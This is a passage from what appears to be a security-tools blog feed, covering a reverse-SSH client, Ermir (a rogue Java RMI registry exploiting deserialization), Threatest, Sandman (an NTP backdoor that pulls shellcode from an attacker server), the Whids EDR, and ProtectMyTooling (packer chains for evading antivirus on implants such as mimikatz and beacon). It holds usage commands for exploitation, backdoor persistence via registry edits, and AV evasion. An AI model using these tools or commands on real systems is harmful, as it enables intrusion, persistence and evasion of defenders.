Then make sure that the go/bin/ directory is in your $PATH

Permission denied (publickey).

Unfortunately the golang crypto/ssh upstream library does not support rsa-sha2-* algorithms, and work is currently ongoing here:


So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following:

ssh-keygen -t ed25519

Windows and SFTP

Due to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows.

sftp -r -J your.rssh.server.com:3232 test-pc.user.test-pc:'/C:/Windows/system32'

Note the / before the starting character.

Foreground vs Background (Important note about clients)

By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed.

This has one important ramification: once in the background a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground flag.

Ermir - An Evil Java RMI Registry

By: Zion3R
30 October 2022 at 11:30

Ermir is an Evil/Rogue RMI Registry, it exploits unsecure deserialization on any Java code calling standard RMI methods on it (list()/lookup()/bind()/rebind()/unbind()).


  • Ruby v3 or newer.


Install Ermir from rubygems.org:

$ gem install ermir

or clone the repo and build the gem:

$ git clone https://github.com/hakivvi/ermir.git
$ rake install


Ermir is a cli gem, it comes with 2 cli files ermir and gadgetmarshal, ermir is the actual gem and the latter is just a pretty interface to GadgetMarshaller.java file which rewrites the gadgets of Ysoserial to match MarshalInputStream requirements, the output should be then piped into ermir or a file, in case of custom gadgets use MarshalOutputStream instead of ObjectOutputStream to write your serialized object to the output stream.

ermir usage:

RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it. Usage: ermir [options] -l, --listen bind the RMI Registry to this ip and port (default: -f, --file path to file containing the gadget to be deserialized. -p, --pipe read the serialized gadget from the standard input stream. -v, --version print Ermir version. -h, --help print options help. Example: $ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen --pipe" dir="auto">
➜  ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen bind the RMI Registry to this ip and port (default:
-f, --file path to file containing the gadget to be deserialized.
-p, --pipe read the serialized gadget from the standard input stream.
-v, --version print Ermir version.
-h, --help print options help.
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen --pipe

gadgetmarshal usage:

➜  ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file

How does it work?

java.rmi.registry.Registry offers 5 methods: list(), lookup(), bind(), rebind(), unbind():

  • public Remote lookup(String name): lookup() searches for a bound object in the registry by its name, the registry returns a Remote object which references the remote object that was looked up, the returned object is read using MarshalInputStream.readObject() which is just another layer on top of ObjectInputStream, basically it excpects after each class/proxy descriptor (TC_CLASSDESC/TC_PROXYCLASSDESC) an URL that will be used to load this class or proxy class. this is the same wild bug that was fixed in jdk7u21. (Ermir does not specify this URL as only old Java version are vulnerable, instead it just write null). as Ysoserial gadgets are being serialized using ObjectOutputStream, Ermir uses gadgetmarshal -a wrapper around GadgetMarshaller.java- to serialize the specified gagdet to match MarshalInputStream requirements.

  • public String[] list(): list() asks the registry for all the bound objects names, while String type cannot be subsitued with a malicious gadget as it is not like any ordinary object and it is not read using readObject() but rather readUTF(), however as list() returns String[] which is an actual object and it is read using readObject(), Ermir sends the gadget instead of this String[] type.

  • public void bind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2): bind() binds an object to a name on the registry, in bind() case the return type is void and there is nothing being returned, however if the registry specifies in the RMI return data packet that this return is an execptional return, the client/server client will call readObject() despite the return type is void, this is how the regitry sends exceptions to its client (usually java.lang.ClassNotFoundException), once again Ermir will deliver the serialized gadget instead of a legitimate Exception object.

  • public void rebind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2): rebind() replaces the binding of the passed name with the supplied remote reference, also returns void, Ermir returns an exception just like bind().

  • public void unbind(java.lang.String $param_String_1): unbind() unbinds a remote object by name in the RMI registry, this one also returns void.



Bug reports and pull requests are welcome on GitHub at https://github.com/hakivvi/ermir. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the code of conduct.


The gem is available as open source under the terms of the MIT License.

Code of Conduct

Everyone interacting in the Ermir project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.

Threatest - Threatest Is A Go Framework For End-To-End Testing Threat Detection Rules

By: Zion3R
29 October 2022 at 11:30

Threatest is a Go framework for testing threat detection end-to-end.

Threatest allows you to detonate an attack technique, and verify that the alert you expect was generated in your favorite security platform.

Read the announcement blog post: https://securitylabs.datadoghq.com/articles/threatest-end-to-end-testing-threat-detection/



A detonator describes how and where an attack technique is executed.

Supported detonators:

  • Local command execution
  • SSH command execution
  • Stratus Red Team
  • AWS detonator

Alert matchers

An alert matcher is a platform-specific integration that can check if an expected alert was triggered.

Supported alert matchers:

  • Datadog security signals

Detonation and alert correlation

Each detonation is assigned a UUID. This UUID is reflected in the detonation and used to ensure that the matched alert corresponds exactly to this detonation.

The way this is done depends on the detonator; for instance, Stratus Red Team and the AWS Detonator inject it in the user-agent; the SSH detonator uses a parent process containing the UUID.

Sample usage

See examples for complete usage example.

Testing Datadog Cloud SIEM signals triggered by Stratus Red Team

threatest := Threatest()

threatest.Scenario("AWS console login").
Expect(DatadogSecuritySignal("AWS Console login without MFA").WithSeverity("medium")).
WithTimeout(15 * time.Minute)

assert.NoError(t, threatest.Run())

Testing Datadog Cloud Workload Security signals triggered by running commands over SSH

ssh, _ := NewSSHCommandExecutor("test-box", "", "")

threatest := Threatest()

threatest.Scenario("curl to metadata service").
WhenDetonating(NewCommandDetonator(ssh, "curl --connect-timeout 1")).
Expect(DatadogSecuritySignal("EC2 Instance Metadata Service Accessed via Network Utility"))

assert.NoError(t, threatest.Run())

Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks

By: Zion3R
28 October 2022 at 11:30

Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.


SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

  • Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.

  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!


  • Getting and executing an arbitrary payload from an attacker's controlled server.

  • Can work on hardened networks since NTP is usually allowed in FW.

  • Impersonating a legitimate NTP server via IP spoofing.


SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.


  • A shellcode is injected into RuntimeBroker.

  • Suspicious NTP communication starts with a known magic header.

  • YARA rule.


Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!

Whids - Open Source EDR For Windows

By: Zion3R
27 October 2022 at 11:30


EDR with artifact collection driven by detection. The detection engine is built on top of a previous project Gene specially designed to match Windows events against user defined rules.

What do you mean by "artifact collection driven by detection" ?

It means that an alert can directly trigger some artifact collection (file, registry, process memory). This way you are sure you collected the artifacts as soon as you could (near real time).

All this work has been done on my free time in the hope it would help other people, I hope you will enjoy it. Unless I get some funding to further develop this project, I will continue doing so. I will make all I can to fix issues in time and provide updates. Feel free to open issues to improve that project and keep it alive.


  • Provide an Open Source EDR to the community
  • Make transparency on the detection rules to make analysts understand why a rule triggered
  • Offer powerful detection primitives though a flexible rule engine
  • Optimize Incident Response processes by drastically reducing the time between detection and artifact collection


NB: the EDR agent can be ran standalone (without being connected to an EDR manager)


  • Open Source
  • Relies on Sysmon for all the heavy lifting (kernel component)
  • Very powerful but also customizable detection engine
  • Built by an Incident Responder for all Incident Responders to make their job easier
  • Low footprint (no process injection)
  • Can co-exist with any antivirus product (advised to run it along with MS Defender)
  • Designed for high throughput. It can easily enrich and analyze 4M events a day per endpoint without performance impact. Good luck to achieve that with a SIEM.
  • Easily integrable with other tools (Splunk, ELK, MISP ...)
  • Integrated with ATT&CK framework


  • Only works on Windows
  • Detection limited to what is available in Windows event logs channels ETW providers/sessions (already a lot in there)
  • No process instrumentation (it is also a strength as it depends on the point of view)
  • No GUI yet (will develop one if requested by the community)
  • No support for ETW (available in beta)
  • Tell me if you notice others ...



  1. Install Sysmon
  2. Configure Sysmon
    • You can find optimized Sysmon configurations here
    • Logging any ProcessCreate and ProcessTerminate is mandatory
  3. Take note of the path to your Sysmon binary because you will need it later on

NB: event filtering can be done at 100% with Gene rules so do not bother creating a complicated Sysmon configuration.

Pre-Installation Recommendations

In order to get the most of WHIDS you might want to improve your logging policy.

  • Enable Powershell Module Logging
  • Audit Service Creation: gpedit.msc -> Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\System\Audit Security System Extension -> Enable
  • Enable File System Audit. Sysmon only provides FileCreate events when new files are created, so if you want/need to log other kind of accesses (Read, Write, ...) you need to enable FS Auditing.
    1. gpedit.msc -> Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Object Access\Audit File System -> Enable
    2. Right Click Any Folder -> Properties -> Security -> Advanced -> Auditing -> Add
      1. Select a principal (put here the name of the user/group you want the audit for). Put group Everyone if you want to log access from any user.
      2. Apply this to is used to select the scope of this audit policy starting from the folder you have selected
      3. Basic permissions select the kinds of accesses you want the logs to be generated for
      4. Validate
    3. File System auditing logs will appear in the Security log channel
  • If you want an antivirus to run on your endpoints, keep Microsoft Defender, first because it is a good AV but also because it logs alerts in a dedicated log channel Microsoft-Windows-Windows Defender/Operational monitored by the EDR.

EDR Endpoint agent (Whids.exe)

This section covers the installation of the agent on the endpoint.

  1. Download and extract the latest WHIDS release https://github.com/0xrawsec/whids/releases
  2. Run manage.bat as administrator
  3. Launch installation by selecting the appropriate option
  4. Verify that files have been created at the installation directory
  5. Edit configuration file by selecting the appropriate option in manage.bat or using your preferred text editor
  6. Skip this if running with a connection to a manager, because rules will be updated automatically. If there is nothing in the rules directory the tool will be useless, so make sure there are some gene rules in there. Some rules are packaged with WHIDS and you will be prompted to choose if you want to install those or not. If you want the last up to date rules, you can get those here (take the compiled ones)
  7. Start the services from appropriate option in manage.bat or just reboot (preferred option otherwise some enrichment fields will be incomplete leading to false alerts)
  8. If you configured a manager do not forget to run it in order to receive alerts and dumps

NB: At installation time the Sysmon service will be made dependent of WHIDS service so that we are sure the EDR runs before Sysmon starts generating some events.

EDR Manager

The EDR manager can be installed on several platforms, pre-built binaries are provided for Windows, Linux and Darwin.

  1. Create TLS certificate if needed for HTTPS connections
  2. Create a configuration file (there is a command line argument to generate a basic config)
  3. Run the binary

Configuration Examples

Please visit doc/configuration.md

Further Documentation

Known Issues

  • Does not work properly when ran from a network share mapped as a network drive (this case prevent whids to identify itself and thus generate some noise). Example: if \\vbox\test is mounted as Z: drive, running Z:\whids.exe won't work while running \\vbox\test\whids.exe actually would.

Roadmap until next release

  • find a new name to the project because we all agree it sucks
  • better sysmon integration (config, deployment, update)
  • endpoint configuration from manager
  • tooling management (update, install), like OSQuery
  • code refactoring and optimization
  • implement a performance monitor
  • get rid of any on-disk configuration
  • implement IOC management capabilities
  • ETW support
  • automatic documentation (OpenAPI) and testing of manager's API
  • provide endpoint system information in manager
  • implement actionable rules
  • provide canary file management
  • builtin commands to be executed by endpoints
  • provide Incident Response reports about endpoints
  • overall manager API improvement
  • provide event streams so that a client can receive events in realtime
  • standardize HTTP headers
  • provide a python library to interact with EDR manager (https://github.com/0xrawsec/pywhids)



  • New Administrative HTTP API with following features:
    • Manage endpoints (list, create, delete)
    • Get basic statistics about the manager
    • Execute commands on endpoints and get results
      • Can drop files prior to execution, to execute binaries/scripts not present on endpoint. Dropped files are deleted after command was ran.
      • Can retrieve files (post command execution), to retrieve results of the command
    • Collect files from endpoints for forensic purposes
    • Contain / Uncontain endpoints by restricting any network traffic except communication to the manager.
    • Query endpoints logs
    • Query endpoints alerts
    • Pivot on a timestamp and retrieve logs/alerts around that time pivot
    • Access endpoint report
      • Scoring (relative to each environment) allowing to sort endpoints and spot the ones behaving differently from the others.
      • Alerts / TTPs observed on a given time frame
    • Manage rules (list, create, update, save, delete)
  • Integration with Sysmon v12 and v13
    • Integrate ClipboardData events
      • Put the content of the clipboard data inside the event to allow creating rule on the content of the clipboard
    • Integrate ProcessTampering events
      • Enrich event with a diffing score between .text section on disk and in memory
  • Implemented certificate pinning on client to enhance security of the communication channel between endpoints and management server
  • Log filtering capabilities, allowing one to collect contextual events. Log filtering is achieved by creating Gene filtering rules (c.f. Gene Documentation).
  • Configuration files in TOML format for better readability
  • Better protection of the installation directory

Related Work


Github:https://github.com/tines Website:https://www.tines.com/ Twitter:@tines_io

ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry

By: Zion3R
26 October 2022 at 11:30

Script that wraps around multitude of packers, protectors, obfuscators, shellcode loaders, encoders, generators to produce complex protected Red Team implants. Your perfect companion in Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.


With ProtectMyTooling you can quickly obfuscate your binaries without having to worry about clicking through all the Dialogs, interfaces, menus, creating projects to obfuscate a single binary, clicking through all the options available and wasting time about all that nonsense. It takes you straight to the point - to obfuscate your tool.

Aim is to offer the most convenient interface possible and allow to leverage a daisy-chain of multiple packers combined on a single binary.

That's right - we can launch ProtectMyTooling with several packers at once:

C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

The above example will firstly pass mimikatz.exe to the Hyperion for obfuscation, and then the result will be provided to UPX for compression. Resulting with UPX(Hyperion(file))


  • Supports multiple different PE Packers, .NET Obfuscators, Shellcode Loaders/Builders
  • Allows daisy-chaining packers where output from a packer is passed to the consecutive one: callobf,hyperion,upx will produce artifact UPX(Hyperion(CallObf(file)))
  • Collects IOCs at every obfuscation step so that auditing & Blue Team requests can be satisfied
  • Offers functionality to inject custom Watermarks to resulting PE artifacts - in DOS Stub, Checksum, as a standalone PE Section, to file's Overlay
  • Comes up with a handy Cobalt Strike aggressor script bringing protected-upload and protected-execute-assembly commands
  • Straightforward command line usage


This tool was designed to work on Windows, as most packers natively target that platform.

Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.

  1. First, disable your AV and add contrib directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.
  2. Then clone this repository
PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling
  1. Actual installation is straightforward:


PS C:\ProtectMyTooling> .\install.ps1


bash# ./install.sh


For ScareCrow packer to run on Windows 10, there needs to be WSL installed and bash.exe available (in %PATH%). Then, in WSL one needs to have golang installed in version at least 1.16:

cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y


To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml configuration file.

There is also config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as reference point.

Friendly reminder

  • If your produced binary crashes or doesn't run as expected - try using different packers chain.
  • Packers don't guarantee stability of produced binaries, therefore ProtectMyTooling cannot as well.
  • While chaining, carefully match output->input payload formats according to what consecutive packer expects.


Before ProtectMyTooling's first use, it is essential to adjust program's YAML configuration file ProtectMyTooling.yaml. The order of parameters processal is following:

  • Firstly default parameters are used
  • Then they're overwritten by values coming from YAML
  • Finally, whatever is provided in command line will overwrite corresponding values

There, supported packer paths and options shall be set to enable.

Scenario 1: Simple ConfuserEx obfuscation

Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:

C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>

[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...

[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%

Scenario 2: Simple ConfuserEx obfuscation followed by artifact test

One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE:

Scenario 3: Complex malware obfuscation with watermarking and IOCs collection

Below use case takes beacon.exe on input and feeds it consecutively into CallObf -> UPX -> Hyperion packers.

Then it will inject specified fooobar watermark to the final generated output artifact's DOS Stub as well as modify that artifact's checksum with value 0xAABBCCDD.

Finally, ProtectMyTooling will capture all IOCs (md5, sha1, sha256, imphash, and other metadata) and save them in auxiliary CSV file. That file can be used for IOC matching as engagement unfolds.

PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd


[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...

[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...

[>] Generating output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

Produced IOCs evidence CSV file will look as follows:

2022-06-10 03:15:52,beacon.exe,[email protected],Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,[email protected],Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,[email protected],Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,[email protected],Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,[email protected],Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

Supported Packers

ProtectMyTooling was designed to support not only Obfuscators/Packers but also all sort of builders/generators/shellcode loaders usable from the command line.

At the moment, program supports various Commercial and Open-Source packers/obfuscators. Those Open-Source ones are bundled within the project. Commercial ones will require user to purchase the product and configure its location in ProtectMyTooling.yaml file to point the script where to find them.

  1. Amber - Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcode
  2. AsStrongAsFuck - A console obfuscator for .NET assemblies by Charterino
  3. CallObfuscator - Obfuscates specific windows apis with different apis.
  4. ConfuserEx - Popular .NET obfuscator, forked from Martin Karing
  5. Donut - Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcode
  6. Enigma - A powerful system designed for comprehensive protection of executable files
  7. Hyperion - runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter"
  8. IntelliLock - combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protection
  9. InvObf - Obfuscates Powershell scripts with Invoke-Obfuscation (by Daniell Bohannon)
  10. LoGiC.NET - A more advanced free and open .NET obfuscator using dnlib by AnErrupTion
  11. Mangle - Takes input EXE/DLL file and produces output one with cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).
  12. MPRESS - MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
  13. NetReactor - Unmatched .NET code protection system which completely stops anyone from decompiling your code
  14. NetShrink - an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.
  15. Nimcrypt2 - Generates Nim loader running input .NET, PE or Raw Shellcode. Authored by (@icyguider)
  16. NimPackt-v1 - Takes Shellcode or .NET Executable on input, produces EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
  17. NimSyscallPacker - Takes PE/Shellcode/.NET executable and generates robust Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
  18. Packer64 - wrapper around John Adams' Packer64
  19. pe2shc - Converts PE into a shellcode. By yours truly @hasherezade
  20. peCloak - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool
  21. peresed - Uses "peresed" from avast/pe_tools to remove all existing PE Resources and signature (think of Mimikatz icon).
  22. ScareCrow - EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loader
  23. sgn - Shikata ga nai (δ»•ζ–ΉγŒγͺい) encoder ported into go with several improvements. Takes shellcode, produces encoded shellcode
  24. SmartAssembly - obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third-party to access your source code
  25. sRDI - Convert DLLs to position independent shellcode. Authored by: Nick Landers, @monoxgas
  26. Themida - Advanced Windows software protection system
  27. UPX - a free, portable, extendable, high-performance executable packer for several executable formats.
  28. VMProtect - protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software

You can quickly list supported packers using -L option (table columns are chosen depending on Terminal width, the wider the more information revealed):

C:\> py ProtectMyTooling.py -L

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <[email protected]>

| # | Name | Type | Licensing | Input | Output | Author |
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege B alci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz WΓ³jcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin VejnΓ‘r, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open -source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, LΓ‘szlΓ³ MolnΓ‘r, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |

Above are the packers that are supported, but that doesn't mean that you have them configured and ready to use. To prepare their usage, you must first supply necessary binaries to the contrib directory and then configure your YAML file accordingly.

RedWatermarker - built-in Artifact watermarking

Artifact watermarking & IOC collection

This program is intended for professional Red Teams and is perfect to be used in a typical implant-development CI/CD pipeline. As a red teamer I'm always expected to deliver decent quality list of IOCs matching back to all of my implants as well as I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.

To accommodate these requirements, ProtectMyTooling brings basic support for them.

Artifact Watermarking

ProtectMyTooling can apply watermarks after obfuscation rounds simply by using --watermark option.:

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG

There is also a standalone approach, included in RedWatermarker.py script.

It takes executable artifact on input and accepts few parameters denoting where to inject a watermark and what value shall be inserted.

Example run will set PE Checksum to 0xAABBCCDD, inserts foooobar to PE file's DOS Stub (bytes containing This program cannot be run...), appends bazbazbaz to file's overlay and then create a new PE section named .coco append it to the end of file and fill that section with preset marker.

py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

Full watermarker usage:

cmd> py RedWatermarker.py --help

j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
